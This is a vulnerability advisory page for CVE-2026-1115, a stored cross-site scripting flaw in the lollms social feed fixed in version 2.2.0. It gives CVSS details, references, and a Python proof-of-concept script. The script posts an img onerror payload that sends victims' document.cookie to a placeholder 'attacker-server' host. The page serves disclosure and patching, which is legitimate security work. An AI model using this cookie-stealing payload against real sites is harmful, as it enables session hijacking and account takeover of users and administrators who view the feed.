Security Vulnerability Report
CVE-2026-1115 CVSS 9.6 CRITICAL

Published: 2026-04-10 07:16:21
Last Modified: 2026-04-16 19:39:35

Description

A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious JavaScript, which is executed in the browsers of users viewing the Home Feed, including administrators. This can lead to account takeover, session hijacking, and wormable attacks. The issue is resolved in version 2.2.0.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lollms:lollms:*:*:*:*:*:*:*:* - VULNERABLE
parisneo/lollms < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target API endpoint for creating a post
target_url = "http://target-host/api/social/create_post"

# Malicious XSS payload to steal cookies
# Using <img> tag with onerror handler is a common bypass technique
xss_payload = '<img src=x onerror=fetch(\'http://attacker-server/steal?c=\'+document.cookie)>'

# Construct the payload data
post_data = {
    "content": xss_payload,
    "title": "Interesting Post"
}

# Send the malicious request
try:
    response = requests.post(target_url, json=post_data)
    if response.status_code == 200:
        print("[+] Payload injected successfully!")
        print("[+] Check the social feed to trigger the XSS.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

References

https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a (Patch)
https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa (Exploit, Third Party Advisory)